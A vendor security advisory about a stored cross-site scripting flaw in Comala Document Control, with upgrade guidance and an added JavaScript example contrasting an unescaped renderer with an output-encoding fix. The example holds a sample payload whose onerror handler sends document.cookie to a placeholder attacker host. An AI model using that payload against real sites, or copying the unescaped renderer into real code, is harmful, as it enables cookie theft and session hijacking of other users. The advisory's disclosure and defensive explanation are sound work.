This advisory discloses a security vulnerability found and fixed in Comala Document Control. We recommend upgrading Comala Document Control to the latest supported version.
The vulnerability affects Comala Document Control 1.4.0 through 1.9.10 (inclusive).
The 1.10.0 release contains a fix for the issue mentioned below.
Versions prior to 1.4.0 are not affected.
Comalatech rates the severity of this issue as Medium according to the published Atlassian Security Levels. We have ranked the vulnerability as Medium because:
- A registered user with edit permissions on pages or blog posts in the application could do the following:
  - Session riding
  - Stealing information and cookies
  - Creating a phishing page within the domain
This is an independent assessment and you should evaluate its applicability to your own IT environment.
We have fixed a cross-site scripting vulnerability introduced in Comala Document Control 1.4.0. The vulnerability could allow a user with page-level workflow usage permissions to use another user's session.
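To illustrate the vulnerability class this advisory describes (not Comala's own code, which the advisory does not show), the following added example renders an attacker-controlled string first without and then with HTML output encoding. The field name `workflowName`, the sample payload and the `attacker.example` host are constructed for the illustration and are not taken from the product or the advisory; the point is only that a value a page editor controls, if written into a page unescaped, executes in the browser of every viewer and can exfiltrate that viewer's cookies or act in their session.

```javascript
// Added illustration of stored XSS and its fix (hypothetical code, not Comala's).
// The untrusted value is assumed to be a workflow-related string that a user with
// edit rights can set and that other users later see rendered on the page.

// Constructed sample payload: an image tag whose error handler ships the
// viewer's cookies to a host the attacker controls (attacker.example is a
// placeholder, not a real endpoint).
const SAMPLE_WORKFLOW_NAME =
  'Review <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable renderer: the untrusted string is concatenated straight into markup,
// so any tag in it becomes part of the page and runs in the viewer's session.
function renderWorkflowLabelVulnerable(workflowName) {
  return `<span class="workflow-label">${workflowName}</span>`;
}

// Output encoding for an HTML text/attribute context. Every character that can
// open a tag, close an attribute, or start an entity is replaced by its entity.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened renderer: same markup, but the untrusted value is encoded at the point
// where it is written into HTML, so the payload is shown as text, not executed.
function renderWorkflowLabelSafe(workflowName) {
  return `<span class="workflow-label">${escapeHtml(workflowName)}</span>`;
}

// Review helper: count tag openers in the produced markup. The renderer itself
// contributes exactly two (<span ...> and </span>); anything beyond that came
// from the untrusted input and is a stored XSS sink.
function countTagOpeners(html) {
  return (html.match(/<[a-z/]/gi) || []).length;
}

function isInjected(html) {
  return countTagOpeners(html) > 2;
}

// Stand-alone demonstration when run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable injected:', isInjected(renderWorkflowLabelVulnerable(SAMPLE_WORKFLOW_NAME)));
  console.log('safe injected:     ', isInjected(renderWorkflowLabelSafe(SAMPLE_WORKFLOW_NAME)));
  console.log(renderWorkflowLabelSafe(SAMPLE_WORKFLOW_NAME));
}
```

The same principle applies whichever templating layer the app uses: encoding has to happen where the value meets the HTML, and the encoding must match the context (text node, attribute, URL, or script) the value is written into. Marking the session cookie HttpOnly blunts the cookie-theft item in the list above but does nothing against session riding, since injected script can still issue requests as the viewer.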
Sites running 1.4.0 through 1.9.10 are recommended to upgrade to Comala Document Control 1.10.0 or later.
If upgrading immediately is not possible, please disable the application until you can upgrade it.